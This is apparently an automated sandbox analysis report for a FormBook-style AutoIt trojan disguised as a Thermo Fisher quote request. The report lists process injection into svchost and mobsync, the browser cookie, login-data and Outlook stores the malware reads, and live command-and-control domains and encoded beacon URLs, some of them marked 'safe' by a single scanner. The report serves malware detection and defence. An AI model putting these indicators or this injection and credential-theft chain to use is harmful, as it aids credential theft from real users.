                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeNtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\mobsync.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: NULL target: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: NULL target: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeThread register set: target process: 5240Jump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeThread APC queued: target process: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeJump to behavior
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2FF1008Jump to behavior
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0063B106 LogonUserW,0_2_0063B106
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00603D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00603D19
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0064411C SendInput,keybd_event,0_2_0064411C
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_006474E7 mouse_event,0_2_006474E7
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe"Jump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeProcess created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0063A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0063A66C
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_006471FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_006471FA
                Source: uxnRAYhIPZRPiA.exe, 00000004.00000000.2197575459.0000000000C71000.00000002.00000001.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000004.00000002.3903215967.0000000000C71000.00000002.00000001.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000006.00000000.2350230515.0000000001571000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, uxnRAYhIPZRPiA.exe, 00000004.00000000.2197575459.0000000000C71000.00000002.00000001.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000004.00000002.3903215967.0000000000C71000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: uxnRAYhIPZRPiA.exe, 00000004.00000000.2197575459.0000000000C71000.00000002.00000001.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000004.00000002.3903215967.0000000000C71000.00000002.00000001.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000006.00000000.2350230515.0000000001571000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: uxnRAYhIPZRPiA.exe, 00000004.00000000.2197575459.0000000000C71000.00000002.00000001.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000004.00000002.3903215967.0000000000C71000.00000002.00000001.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000006.00000000.2350230515.0000000001571000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_006265C4 cpuid 0_2_006265C4
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0065091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_0065091D
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0067B340 GetUserNameW,0_2_0067B340
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00631E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00631E8E
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0061DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0061DDC0

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3902711809.0000000000640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3902432308.0000000000140000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2275832203.0000000003E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3903604602.0000000004090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2275895141.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2275163756.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3905763155.00000000052D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3903709621.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeBinary or memory string: WIN_81
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeBinary or memory string: WIN_XP
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeBinary or memory string: WIN_XPe
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeBinary or memory string: WIN_VISTA
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeBinary or memory string: WIN_7
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3902711809.0000000000640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3902432308.0000000000140000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2275832203.0000000003E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3903604602.0000000004090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2275895141.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2275163756.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3905763155.00000000052D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3903709621.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00658C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00658C4F
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0065923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_0065923B
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                3
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                5
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts
                1
                Abuse Elevation Control Mechanism
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                5
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts
                3
                Obfuscated Files or Information
                NTDS116
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                5
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation
                1
                DLL Side-Loading
                LSA Secrets251
                Security Software Discovery
                SSH3
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection
                2
                Valid Accounts
                Cached Domain Credentials2
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem1
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1559710 Sample: Thermo Fisher Scientific - ... Startdate: 20/11/2024 Architecture: WINDOWS Score: 100 28 www.tals.xyz 2->28 30 www.logidant.xyz 2->30 32 11 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 50 4 other signatures 2->50 10 Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->64 66 Writes to foreign memory regions 10->66 68 Maps a DLL or memory area into another process 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 uxnRAYhIPZRPiA.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 mobsync.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 uxnRAYhIPZRPiA.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 logidant.xyz 45.141.156.114, 49938, 49945, 49952 YURTEH-ASUA Germany 22->34 36 www.izmirescortg.xyz 104.21.36.62, 49748, 80 CLOUDFLARENETUS United States 22->36 38 8 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe42%ReversingLabsWin32.Trojan.AutoitInject
                Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.logidant.xyz/iuvu/0%Avira URL Cloudsafe
                http://www.madhf.tech/0mwe/?sVC8z=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN+4NwIpTlqvPWS8Sl4p5VjB9j49JCBEhVmvR6biJ/0AaWeg==&PPP=FHWL560%Avira URL Cloudsafe
                http://www.canadavinreport.site/g3h7/?sVC8z=dyqW+SkpLS8uL5dRky9k7MKcOglS/8z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BXuIfA/6aNcSUPn2xNM4zETNmyU4aFxTXIL5EZw83E41rkQ==&PPP=FHWL560%Avira URL Cloudsafe
                http://www.yunlekeji.top/t322/?PPP=FHWL56&sVC8z=FCfXCbowRdQKA3bKzmWhb/MMDIYWCwffvgnpa1jm1l5RPo8GmzCZxrunal2GKioIIi33qnUs85PYplnvRA3XX9RPs5/iUffq0tmKE8rYJBtcI2bhCRGcMbzPlb/C9uxVPg==0%Avira URL Cloudsafe
                http://www.brightvision.website/gn26/?sVC8z=fgpTVhEuh+HnR3p0lfNLmVuUqPxSLN4hCHlB5YwrT5j1SjgoO/sQ0W1xqV3uB3iqP4rffdiJ/shc0ougvjbd7NMKGX1gMLgBVaz3e9231X82jxOqgG++QmJ2h2W7Ejj4Gw==&PPP=FHWL560%Avira URL Cloudsafe
                http://www.madhf.tech/0mwe/?sVC8z=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY0%Avira URL Cloudsafe
                http://www.zkdamdjj.shop/kf1m/0%Avira URL Cloudsafe
                http://www.tals.xyz/k1td/0%Avira URL Cloudsafe
                http://www.canadavinreport.site/g3h7/0%Avira URL Cloudsafe
                http://aballanet.cat/6xrr/?sVC8z=HxJAUmNG5a0%Avira URL Cloudsafe
                http://www.brightvision.website0%Avira URL Cloudsafe
                https://zkdamdjj.shop/kf1m/?sVC8z=gD/FPiA75bYZCbZDbB0%Avira URL Cloudsafe
                http://www.logidant.xyz/iuvu/?sVC8z=4GSi4NjhieA+eby0NKQzTEPCPA5td1TZNopVgGr+MixqN2kv+x7vZ9YkKN38Qwr7I1LnRiqAhNhB07BIn5ynY1PA81WB0aqcrP8TCrRqA4T6i/Y0YCRnlTl6YfLJ6nzbiw==&PPP=FHWL560%Avira URL Cloudsafe
                http://www.aballanet.cat/6xrr/?sVC8z=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBWZyS1GVQka4TzLjh3pjJtHZ6h8tdWKE4MgApWPfIsL675g==&PPP=FHWL560%Avira URL Cloudsafe
                http://www.thinkphp.cn0%Avira URL Cloudsafe
                http://www.aballanet.cat/6xrr/0%Avira URL Cloudsafe
                http://www.izmirescortg.xyz/lnl7/?sVC8z=kAPJ1zL1a1XedmcrdtHAbU+8MxIg1b6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgfVGx56k02tXkAzZldWa3Ro5vlhsr06JocjtffJpgas7XnA==&PPP=FHWL560%Avira URL Cloudsafe
                http://www.laohub10.net/36be/0%Avira URL Cloudsafe
                http://www.laohub10.net/36be/?sVC8z=zT+fCPSXWqCfWPgMnoOydtJKsJuCEtGx9/DVuG0pIlquWt59hgdSk8Rx6eVvndf2YPyLwPhL3z2g/EyQU+U7tD9cl/byRSbJ8t/R3+K3cKRBXN0bJbe4ZjKihmDBlTXN1Q==&PPP=FHWL560%Avira URL Cloudsafe
                http://www.zkdamdjj.shop/kf1m/?sVC8z=gD/FPiA75bYZCbZDbB+WsVUzjKMJP+r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoRPOyc9x0vhFbku7Ub3qNJZbDXed1slXSq/MHP91YwZ61FA==&PPP=FHWL560%Avira URL Cloudsafe
                http://www.tals.xyz/k1td/?sVC8z=oEMxw+ab8QlEZmTmAbDEuuFmAVWx5xMHQHNpbkBMxCjDr7HlodnZgfFsQKGKkvz/XYzpvPMYep3+sZsYYHcCVG2YOA5cLjPPS3bUYxhUJeAm1ae/P1TsW9+p+FqZ3lrXmQ==&PPP=FHWL560%Avira URL Cloudsafe
                http://www.canadavinreport.site/g3h7/?sVC8z=dyqW0%Avira URL Cloudsafe
                http://www.madhf.tech/0mwe/0%Avira URL Cloudsafe
                http://www.brightvision.website/gn26/0%Avira URL Cloudsafe
                http://www.yunlekeji.top/t322/0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                www.izmirescortg.xyz
                104.21.36.62
                truetrue
                  unknown
                  www.brightvision.website
                  203.161.42.73
                  truefalse
                    unknown
                    www.madhf.tech
                    103.224.182.242
                    truefalse
                      unknown
                      r0lqcud7.nbnnn.xyz
                      202.79.161.151
                      truefalse
                        unknown
                        logidant.xyz
                        45.141.156.114
                        truetrue
                          unknown
                          www.yunlekeji.top
                          106.15.109.33
                          truefalse
                            unknown
                            www.tals.xyz
                            13.248.169.48
                            truetrue
                              unknown
                              www.zkdamdjj.shop
                              104.21.40.167
                              truefalse
                                unknown
                                www.canadavinreport.site
                                185.27.134.206
                                truefalse
                                  unknown
                                  aballanet.cat
                                  134.0.14.158
                                  truetrue
                                    unknown
                                    www.logidant.xyz
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.laohub10.net
                                      unknown
                                      unknownfalse
                                        unknown
                                        www.aballanet.cat
                                        unknown
                                        unknownfalse
                                          unknown
                                          NameMaliciousAntivirus DetectionReputation
                                          http://www.canadavinreport.site/g3h7/?sVC8z=dyqW+SkpLS8uL5dRky9k7MKcOglS/8z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BXuIfA/6aNcSUPn2xNM4zETNmyU4aFxTXIL5EZw83E41rkQ==&PPP=FHWL56false
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.canadavinreport.site/g3h7/false
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.yunlekeji.top/t322/?PPP=FHWL56&sVC8z=FCfXCbowRdQKA3bKzmWhb/MMDIYWCwffvgnpa1jm1l5RPo8GmzCZxrunal2GKioIIi33qnUs85PYplnvRA3XX9RPs5/iUffq0tmKE8rYJBtcI2bhCRGcMbzPlb/C9uxVPg==false
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.brightvision.website/gn26/?sVC8z=fgpTVhEuh+HnR3p0lfNLmVuUqPxSLN4hCHlB5YwrT5j1SjgoO/sQ0W1xqV3uB3iqP4rffdiJ/shc0ougvjbd7NMKGX1gMLgBVaz3e9231X82jxOqgG++QmJ2h2W7Ejj4Gw==&PPP=FHWL56false
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.tals.xyz/k1td/false
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.madhf.tech/0mwe/?sVC8z=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN+4NwIpTlqvPWS8Sl4p5VjB9j49JCBEhVmvR6biJ/0AaWeg==&PPP=FHWL56false
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.logidant.xyz/iuvu/false
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.zkdamdjj.shop/kf1m/false
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.aballanet.cat/6xrr/?sVC8z=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBWZyS1GVQka4TzLjh3pjJtHZ6h8tdWKE4MgApWPfIsL675g==&PPP=FHWL56true
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.logidant.xyz/iuvu/?sVC8z=4GSi4NjhieA+eby0NKQzTEPCPA5td1TZNopVgGr+MixqN2kv+x7vZ9YkKN38Qwr7I1LnRiqAhNhB07BIn5ynY1PA81WB0aqcrP8TCrRqA4T6i/Y0YCRnlTl6YfLJ6nzbiw==&PPP=FHWL56false
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.laohub10.net/36be/?sVC8z=zT+fCPSXWqCfWPgMnoOydtJKsJuCEtGx9/DVuG0pIlquWt59hgdSk8Rx6eVvndf2YPyLwPhL3z2g/EyQU+U7tD9cl/byRSbJ8t/R3+K3cKRBXN0bJbe4ZjKihmDBlTXN1Q==&PPP=FHWL56false
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.aballanet.cat/6xrr/true
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.laohub10.net/36be/false
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.zkdamdjj.shop/kf1m/?sVC8z=gD/FPiA75bYZCbZDbB+WsVUzjKMJP+r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoRPOyc9x0vhFbku7Ub3qNJZbDXed1slXSq/MHP91YwZ61FA==&PPP=FHWL56false
                                          • Avira URL Cloud: safe
                                          unknown
